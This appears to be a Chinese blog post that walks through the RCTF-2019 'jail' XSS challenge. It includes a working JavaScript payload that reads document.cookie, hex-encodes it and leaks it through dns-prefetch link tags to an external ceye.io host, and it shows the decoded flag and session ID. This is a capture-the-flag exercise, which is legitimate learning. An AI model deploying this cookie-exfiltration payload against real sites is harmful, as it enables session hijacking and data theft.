xss太菜了,只能记录一下做题,只想到这种办法来提升自己,从现在开始记录

RCTF-2019 jail

进去之后注册登录

url:https://jail.2019.rctf.rois.io/
post message

url:https://jail.2019.rctf.rois.io/?action=feedback
向服务器提交message对应的id,然后管理员会查看

https://jail.2019.rctf.rois.io/
删除所有message

https://jail.2019.rctf.rois.io/?action=profile
个人信息界面可以上传图片更换头像

profile界面传php都会被转jpg,而且明显就是xss题目,message界面是不给x的

没思路,看了pakho师傅的wp才知道,先头像上传js,再post message时传入要xss payload,然后将id传给admin访问

并且cookie有两个hint
img
img
禁掉了meta的跳转,师傅用了link标签的预加载
https://blog.csdn.net/qq_31481187/article/details/53027208
构造

<link rel="dns-prefetch" href="//[cookie].xxx.ceye.io">

payload
2.js

function Strtohex(Things){
    var str = '';
    for (var i = 0; i < Things.length ; i++) {
        str += Things[i].charCodeAt(0).toString(16);
    }
    return str;
}
var i=document.createElement('link');
i.setAttribute('rel','dns-prefetch');
i.setAttribute('href','//'+Strtohex(document.cookie.substr(0,20))+'.lekg1p.ceye.io');
document.head.appendChild(i);
var i=document.createElement('link');
i.setAttribute('rel','dns-prefetch');
i.setAttribute('href','//'+Strtohex(document.cookie.substr(20,20))+'.lekg1p.ceye.io');
document.head.appendChild(i);
var i=document.createElement('link');
i.setAttribute('rel','dns-prefetch');
i.setAttribute('href','//'+Strtohex(document.cookie.substr(40,20))+'.lekg1p.ceye.io');
document.head.appendChild(i);
  • 传入2.js
    查看源代码,获取图片地址
    img

  • message构造xss

<script src="/uploads/0de87eb8ec27447b6be5586edfca7154.js"></script>

查看id
img

  • postid给admin
    img

img

5f7468655f6368616f735f77307231647d3b2050.lekg1p.ceye.io
48505345535349443d3531653138366666353662.lekg1p.ceye.io
666c61673d524354467b77656c63306d655f7430.lekg1p.ceye.io

解一下hex编码

"666c61673d524354467b77656c63306d655f7430".decode("hex")
'flag=RCTF{welc0me_t0'
"5f7468655f6368616f735f77307231647d3b2050".decode("hex")
'_the_chaos_w0r1d}; P'
'HPSESSID=51e186ff56b'
flag=RCTF{welc0me_t0_the_chaos_w0r1d}
Categories: webxss

Leave a Reply

Your email address will not be published. Required fields are marked *